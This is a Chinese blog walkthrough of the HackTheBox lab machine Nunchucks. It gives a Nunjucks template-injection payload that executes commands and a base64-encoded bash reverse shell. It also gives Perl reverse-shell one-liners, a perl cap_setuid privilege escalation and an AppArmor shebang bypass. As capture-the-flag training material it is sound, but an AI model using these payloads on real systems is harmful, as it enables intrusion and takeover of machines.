HackTheBox | Nunchucks

已于 2023-01-07 15:02:54 修改
阅读量114 收藏
点赞数
分类专栏: htb记录 文章标签: 网络安全
于 2023-01-07 15:02:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/128591100
版权

HackTheBox | Nunchucks

nmap扫描,开放22、80、443

image-20230107131958769

修改本地hosts文件,访问web站点

image-20230107132150832

找到登录页面和注册页面,但是都被禁用

image-20230107132423149

dirsearch扫描也没有什么有效信息

image-20230107132917181

在页面最下方看到links,其中有个store还未上线

看了wp之后知道,确实存在store这个站点,将store.nunchucks.htb添加到hosts文件中访问

image-20230107133308810

在页面中输入框内输入内容,发现会回显到前端

image-20230107133451569

尝试SSTI,确实存在;由于直接输入{{3*3}}时会提示让输入邮箱,所以写成了完整的邮箱格式

image-20230107133543559

使用payload成功命令执行,参考《SANDBOX BREAKOUT - A VIEW OF THE NUNJUCKS TEMPLATE ENGINE》http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}

image-20230107140440770

反弹shell

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMSI=|base64 -d|bash -i')\")()}}

image-20230107140753266

检查SUID,看到/usr/sbin/pppd

image-20230107141039629

上传LinEnum.sh信息收集

看到特殊cap特权,perl存在cap_setuid权限

image-20230107141529493

找到特权利用方法

image-20230107141817716

直接使用上面的无法获取到root权限的shell,所以尝试命令执行,发现可以执行一些简单的命令

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'

image-20230107141826371

尝试直接使用perl反弹shell,在网上找到两种perl反弹shell的方式,第二种成功getshell;第一种会在接收到shell之后立即断开

# 方法一
perl -e 'use Socket;$i="10.10.10.11";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# 方法二
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.11:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

方法二反弹回来的shell权限如下

image-20230107143745024

但是问题在于,虽然是root用户,仍然无法读取root路径下的内容,提示权限不足

查看wp之后,看到涉及到apparmor,又是一个没有接触过的东西

查找资料《apparmor_什么是AppArmor?如何确保Ubuntu安全?》https://blog.csdn.net/culingluan4376/article/details/108708675

apparmor可以用于细粒度的权限控制,其配置文件位于/etc/apparmor.d路径下

进入路径,看到了配置文件

image-20230107144334471

usr.bin.perl文件中记录了perl的权限控制情况,可以看到拒绝了对/root路径下文件的读写执行,所以无法看到root用户家目录下的内容

# Last Modified: Tue Aug 31 18:25:30 2021
#include <tunables/global>

/usr/bin/perl {
  #include <abstractions/base>
  #include <abstractions/nameservice>
  #include <abstractions/perl>

  capability setuid,

  deny owner /etc/nsswitch.conf r,
  deny /root/* rwx,
  deny /etc/shadow rwx,

  /usr/bin/id mrix,
  /usr/bin/ls mrix,
  /usr/bin/cat mrix,
  /usr/bin/whoami mrix,
  /opt/backup.pl mrix,
  owner /home/ r,
  owner /home/david/ r,

}

其中有一个特殊的perl文件/opt/backup.pl,查看文件内容

#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);

my $tmpdir        = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";

sub printlog
{
    print "[", strftime("%D %T", localtime), "] $_[0]\n";
}

sub archive
{
    printlog "Archiving...";
    system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
    printlog "Backup complete in $tmpbdir/backup_$now.tar";
}

if ($> != 0) {
    die "You must run this script as root.\n";
}

printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";

虽然不会perl编程,但是可以强行理解以下脚本内容。大概作用就是将/var/www目录下的内容进行压缩,然后存储到/opt/web_backups路径下,好像没有可以利用的点

又是参考了wp,利用了apparmor对perl限制的一个bug,参考《Unable to prevent execution of shebang lines》https://bugs.launchpad.net/apparmor/+bug/1911431

该bug大概是描述了可以通过执行perl脚本的方式绕过perl -e执行过程中的权限限制。将前面利用的perl+cap命令执行的语句改写为脚本,然后执行,确实成功绕过限制。

image-20230107145643139

image-20230107145609156

xxL7-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 4012
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
Hack The Box注册 —邀请码教学(含注册失败及解决步骤)
热门推荐
qq_43337502的博客
08-15 1万+
Hack The Box注册 —邀请码教学(含注册失败及免费上网步骤)嫌麻烦的直接看这里详细教学看这里重头戏(无法注册解决方法) 官网:https://www.hackthebox.eu 邀请码填写地址:https://www.hackthebox.eu/invite 注册账号时需科学online 验证google机器人验证,提前准备好 推荐用手机注册,当然电脑也行(手机更快),这里用手机教学 嫌麻烦的直接看这里 打开官网->开发者选项(F12)->点击Console-> 输入$.post
Hackthebox靶场连接
weixin_47100211的博客
04-03 3000
关于注册账号 刚开始注册账号 注册账号需要科学上网之后才可以注册,否则点击注册后没有反应 另外在填写全名时需要在姓后面加空格否则不符合规范 例如: Zhang san 靶场会提供免费的机器来供参与者使用,VIP会有更多的功能和把靶场使用,并且有官方的靶场解析,每周会有新的靶场加入到免费的使用中。 使用靶场有两种方式,第一种是在线环境,但是免费用户只有2个小时的使用时间,我使用本地的第二种方法,用kali连接VPN使用靶场。 选择第一个靶场后下载VPN文件: 有两种方法可以连接,我选择的
Hackthebox Three
lixiangshidie的博客
12-29 671
hackthebox three
Hack The Box靶场简单使用流程
Zyu0
11-26 2202
加入一个动态增长的黑客社区,并通过最迷人的、游戏化的、实际操作的培训经验,把您的网络安全技能提高到下一个水平!
HTB_Nunchucks
weixin_44193247的博客
10-02 375
HTB_学习篇
HTB-Nunchucks
TA不懒,但还没有添加简介
09-08 140
HTB-Nunchucks
pong:使用两个 Wii Nunchucks、一个 16x12 LED 矩阵显示器和一个使用 Raspberry Pi Model B 的 7 段显示器的 Pong 的简单实现
07-07
乒乓使用两个 Wii Nunchucks、一个 16x12 LED 矩阵显示器和一个使用 Raspberry Pi Model B 的 7 段显示器的 Pong 的简单实现。设置要玩我们的 Pong 游戏,您需要以下组件: 2 Wii 双节棍2 个1 个1您还需要 BCM285 库...
Atom-lazy-light-syntax,懒原子轻语法主题。(javascript、nunchucks、php、twig、html).zip
09-18
Atom-lazy-light-syntax.zip,懒原子轻语法主题。(javascript、nunchucks、php、twig、html)懒光语法主题,atom是一个用web技术构建的开源文本编辑器。
Experimenting with Raspberry Pi(Apress,2014)
04-03
Written with budgets in mind, author Warren Gay encourages you to build, experiment, and swap out various parts to learn more about the Pi and come up with the best ideas and instructions for your ...
渗透测试平台【Hack The Box】获取邀请码与注册讲解
爱国小白帽
12-08 4485
Hack The Box 官方网址:hackthebox.eu/ : 注册鏈接 这里需要填写邀请码,想想会在哪里呢? 第一步肯定是打开F12,查看网络,发现有inviteapi.min.js inviteapi.min.js的全拼是邀请人的意思,答案会不会在这里呢?我们双击打开 然后跳到了这样的页面,发现有makeInviteCode这样的函数 百度翻译是生成邀请代码的意思,答案是这没...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8338
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
该资源为YOLOv5中6.0版本的预测文件,增添了自动裁剪所需类别,同时还增加了自定义感兴趣区域检测
07-17
该资源为YOLOv5中6.0版本的预测文件,增添了自动裁剪所需类别,同时还增加了自定义感兴趣区域检测。 该资源的介绍我也将写成博客,其中有不明白的改动,可在博客中评论,或者直接私信我。
torchaudio-0.10.0+cpu-cp38-cp38-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
PISI 电源完整性-芯片电源design&simulation
最新发布
07-17
本资料是PISI领域的专业用书,针对电源完整性--芯片及系统的电源完整性建模与设计做出详细指导与说明,PI领域白皮书。 本资料仅用于学习交流用途,勿做商用。
选择Z-Wave智能家居系统的10个原因(英文版)
07-17
我们经常被问到这个问题。什么是Z-Wave?Z-Wave联盟的目的是什么?这本书会给出明确的答案。 Z-Wave联盟是一个由成员驱动的标准化组织,致力于开发、推广、教育和推广Z-Wave技术,面向制造商、安装商和最终用户,以促进Z-Wave标准在物联网应用中的成功。 Z-Wave联盟根据标准对设备进行认证,这些标准可确保所有代际Z-Wave设备之间的完全前后兼容性和互操作性。这些标准包括可靠性、范围、功耗、设备兼容性和未来就绪性的规范。联盟成员是行业领导者,提供互联产品、软件和系统,为住宅和商业智能建筑及其内部人员提供更高的舒适度、便利性、节能、安全和保障。 联盟正共同努力将Z-Wave推向新的应用领域,向最终用户推广Z-Wave,并为Z-Wave开发新的技术功能和机会。
Eraser 6.2.0.2993
07-17
Eraser 是一款用于安全擦除数据的软件,它可以确保数据被彻底删除,使得常规的数据恢复方法失效。
自洁式过滤器ZJF-500使用说明书.doc
07-17
说明书
ucf101每个分类的样本个数
04-02
56. Nunchucks: 118 57. ParallelBars: 149 58. PizzaTossing: 100 59. PlayingCello: 150 60. PlayingDaf: 100 61. PlayingDhol: 100 62. PlayingFlute: 149 63. PlayingGuitar: 147 64. PlayingPiano: 150...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值